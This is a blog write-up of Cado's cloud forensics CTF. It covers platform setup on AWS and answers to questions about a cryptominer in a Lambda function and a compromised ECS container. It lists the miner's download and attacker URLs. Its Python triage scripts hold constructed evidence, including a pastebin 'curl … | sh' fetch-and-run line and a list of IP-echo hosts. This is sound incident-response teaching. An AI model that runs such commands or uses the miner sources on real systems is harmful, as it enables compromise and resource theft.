Cloud Forensic Write-up Investigating Serverless and Container Attacks Cado CTF on AWS

Jeffry Gunawan
MII Cyber Security Consulting Services
5 min read · Dec 27, 2022

Quoting the website: "Captured by Cado is a Capture the Flag (CTF) challenge series designed to educate incident responders on how to investigate attacks on cloud-based systems. This challenge is specifically focused on investigating three attack scenarios in Lambda serverless functions and ECS container systems." (Cado, 2022).

Pre-Requisites

  • Basic knowledge of cloud computing (and of how to use AWS)
  • Basic knowledge of forensic investigation
  • Basic knowledge of Linux
  • An AWS Free Tier account

Overview Platform Installation

First, register on this website: Webinar: Captured by Cado — Serverless & Container Attack Investigation (cadosecurity.com)

Platform Installation Overview

It will then show you the steps, and you will receive a reply email like the one in the picture below.

There are 2 CTFs: the first uses the Lambda service and the second uses ECS.

Step-by-step: Installing the CTF Platform

1. Open CloudFormation in the AWS Console, then import the CloudFormation template. (You can follow the tutorial: https://vimeo.com/734144691)
Using template Cloud Formation

2. Then fill in the stack name and click Next.

Fill the input box

3. In another tab, create your key pair in EC2.

Create a key pair

4. Allow access from any IP. Fill the box with 0.0.0.0/0, which means the instance is reachable from anywhere on the internet (for a lab you only use yourself, your own public IP address is a safer value).

Allow all ip address

5. Tick the acknowledgement, then submit.

Submit check button

6. Then wait until the stack status shows that deployment has finished.

Stack deploying status

7. After it completes, view Outputs > CadoURL.
That is the URL for accessing the CTF platform. Copy the InstanceID for the next step (the first-time login and password change use the InstanceID).

8. Log in with username admin; the password is the InstanceId.

Login Page Cado Platform

9. Accept the agreement.

Agreement CADO

10. Change your password on first login.

Change Password

11. Open the Community License from your email, as shown here. Then save it in JSON format.

Community License

12. Upload it to your Cado platform and submit.

Uploading License Cado

13. The Cado platform dashboard view.

Cado Dashboard

14. Download the CTF files. Link: https://github.com/cado-security/ctf-lambda-containers/releases/tag/v1.0

Cado Github

15. Download both of them.

Download Cado CTF Assets

16. Upload the files to your S3 bucket.

Assets upload using S3

17. Create 2 projects, named Lambda CTF and ECS CTF.

Create Project CADO

18. Result of the project creation.

Empty Project Cado

19. Import the artifact from S3.

How to import artifact using s3

20. Choose and import the object.

Import the ctf assets

21. Processing will start automatically.

Starting the Evidence

Lambda CTF Writeup

Looking in the AWS Console, you discover a Lambda function that nobody knows anything about.

You use Cado Response to acquire the Lambda function and its associated logs and immediately find that it’s a cryptominer running in Lambda.

Questions:

  • What are the three URLs embedded in the script?

The step to get the answer is simply to read the source code.

Malicious function source code
Payload decoded from base64

https://github.com/xmrig/xmrig/releases/download/v6.12.2/xmrig-6.12.2-linux-x64.tar.gz

https://denonia.xyz

https://cloudflare-dns.com/dns-query?name=gw.denonia.xyz

  • When was the first time this function was run?

GMT: Tuesday, June 28, 2022 3:47:30 PM
Your time zone: Tuesday, June 28, 2022 10:47:30 PM GMT+07:00
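The two Lambda answers above come from decoding the function's base64-wrapped script and reading the first invocation's timestamp from its logs. The Python below is an added example, not code from the write-up or from Cado: it decodes a constructed base64 blob that embeds the three URLs listed above and extracts them, and it renders an epoch timestamp in UTC and in the author's GMT+07:00 zone. The epoch value 1656431250 is chosen here to match the stated first-run time; the page does not give the raw log value.

```python
import base64
import re
from datetime import datetime, timedelta, timezone

# Constructed sample: a tiny script body that embeds the three URLs the
# write-up reports, base64-encoded the way the Lambda payload was. It is NOT
# the CTF's real function code, only the shape the triage step must handle.
SAMPLE_SCRIPT = """#!/bin/sh
MINER=https://github.com/xmrig/xmrig/releases/download/v6.12.2/xmrig-6.12.2-linux-x64.tar.gz
C2=https://denonia.xyz
DOH="https://cloudflare-dns.com/dns-query?name=gw.denonia.xyz"
"""
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode()).decode()

# A URL runs until whitespace or a quote/angle bracket.
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")


def decode_payload(blob: str) -> str:
    """Decode a base64 blob, tolerating stripped '=' padding."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def extract_urls(text: str) -> list:
    """Return the distinct URLs in text, in order of first appearance."""
    found = []
    for url in URL_RE.findall(text):
        if url not in found:
            found.append(url)
    return found


def urls_from_encoded(blob: str) -> list:
    """Decode then extract: the two steps the write-up performs by hand."""
    return extract_urls(decode_payload(blob))


def _fmt(dt: datetime) -> str:
    """Format like an epoch converter: 'Tuesday, June 28, 2022 3:47:30 PM'."""
    hour12 = dt.hour % 12 or 12
    return f"{dt.strftime('%A, %B')} {dt.day}, {dt.year} {hour12}:{dt.strftime('%M:%S %p')}"


def epoch_to_local(ts: float, offset_hours: int = 7) -> dict:
    """Render an epoch timestamp in UTC and at a fixed UTC offset.

    CloudWatch log timestamps are milliseconds; anything above 1e11 is
    treated as milliseconds, smaller values as seconds.
    """
    if ts > 1e11:
        ts = ts / 1000.0
    utc = datetime.fromtimestamp(ts, tz=timezone.utc)
    local = utc.astimezone(timezone(timedelta(hours=offset_hours)))
    sign = "+" if offset_hours >= 0 else "-"
    label = f"GMT{sign}{abs(offset_hours):02d}:00"
    return {"utc": _fmt(utc), "local": f"{_fmt(local)} {label}"}


if __name__ == "__main__":
    for url in urls_from_encoded(SAMPLE_B64):
        print("URL:", url)
    # Constructed epoch value matching the write-up's first-run answer.
    stamps = epoch_to_local(1656431250)
    print("GMT:", stamps["utc"])
    print("Your time zone:", stamps["local"])
```

Running the decode over the acquired function's payload rather than the constructed sample gives the same list without manually scanning the decoded text, and the URLs are then directly usable as indicators for log and DNS searches.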

ECS CTF

The AWS Console also shows some containers that request way more vCPU resources than your standard containers do.

You use Cado Response to acquire the container, and again, you find that someone installed a cryptominer.

Questions:

  • What users did the attacker create?
/etc/passwd evidence
bash history evidence

evil_account, drevil

  • What command did the attacker run from Pastebin.com?
echo Hello World
  • How did the attacker find out what the external IP address of the system was?
bash history evidence
curl command to get external address
  • BONUS: What might be some additional data you want to collect to understand more?

If auditd is installed, its logs are much better evidence and must be collected as well.
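The three ECS answers above are read from two artifacts: the container's /etc/passwd (diffed against what the image originally shipped) and the shell history. As an added example, not code from the write-up or from Cado, the Python below automates those checks on constructed evidence: a baseline passwd from a clean copy of the image, the recovered passwd containing the two accounts named above, and a bash history shaped after the commands the write-up describes (UIDs, home directories, the pastebin path and the IP-echo host are all made up here; the page does not give them).

```python
import re

# Constructed evidence. The baseline is what a clean copy of the container
# image contains; the evidence copy is what was recovered from the acquired
# container. UIDs and home directories are invented for the sample.
BASELINE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
"""
EVIDENCE_PASSWD = BASELINE_PASSWD + """evil_account:x:1001:1001::/home/evil_account:/bin/bash
drevil:x:1002:1002::/home/drevil:/bin/bash
"""

# Constructed .bash_history. The pastebin path is a placeholder; per the
# write-up the fetched script only ran "echo Hello World".
SAMPLE_HISTORY = """ls -la
useradd -m evil_account
useradd -m drevil
curl -s https://pastebin.com/raw/PLACEHOLDER | sh
curl ifconfig.me
apt-get install -y build-essential
"""

# Public services commonly used to learn a host's external address.
IP_ECHO_HOSTS = ("ifconfig.me", "icanhazip.com", "checkip.amazonaws.com",
                 "api.ipify.org", "ipinfo.io")
PASTE_SITES = ("pastebin.com",)
FETCH_RE = re.compile(r"\b(curl|wget)\b")


def parse_passwd(text: str) -> dict:
    """Map account name -> fields for every well-formed passwd line."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip damaged lines rather than abort the triage
        name, _, uid, gid, _gecos, home, shell = fields
        users[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def new_accounts(baseline_text: str, evidence_text: str) -> list:
    """Accounts present in the evidence passwd but absent from the baseline."""
    base = parse_passwd(baseline_text)
    evidence = parse_passwd(evidence_text)
    return sorted(set(evidence) - set(base))


def history_findings(history_text: str) -> list:
    """Tag history lines that answer the write-up's questions.

    Returns (category, line) pairs in the order the commands were typed.
    """
    findings = []
    for line in history_text.splitlines():
        low = line.lower()
        tokens = low.split()
        if tokens and tokens[0] in ("useradd", "adduser"):
            findings.append(("account creation", line))
        elif FETCH_RE.search(low) and any(h in low for h in PASTE_SITES):
            findings.append(("script fetched from paste site", line))
        elif FETCH_RE.search(low) and any(h in low for h in IP_ECHO_HOSTS):
            findings.append(("external IP lookup", line))
    return findings


if __name__ == "__main__":
    print("Accounts added:", ", ".join(new_accounts(BASELINE_PASSWD, EVIDENCE_PASSWD)))
    for category, line in history_findings(SAMPLE_HISTORY):
        print(f"[{category}] {line}")
```

Diffing against a baseline passwd is more reliable than eyeballing the file, because an attacker-created account can be given a low UID or a system-looking name; the history scan only tells you that something was fetched from the paste site, so the fetched content itself (here, the "echo Hello World" the write-up found) still has to be retrieved from the evidence or the site.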

References:

GitHub — cado-security/ctf-lambda-containers

https://offers.cadosecurity.com/serverless-container-attack-investigation


Jeffry Gunawan
MII Cyber Security Consulting Services

Cyber Security Consultant | CEH(P), CHFI, ECIH, CSA, CSCU, SC200,400,300,900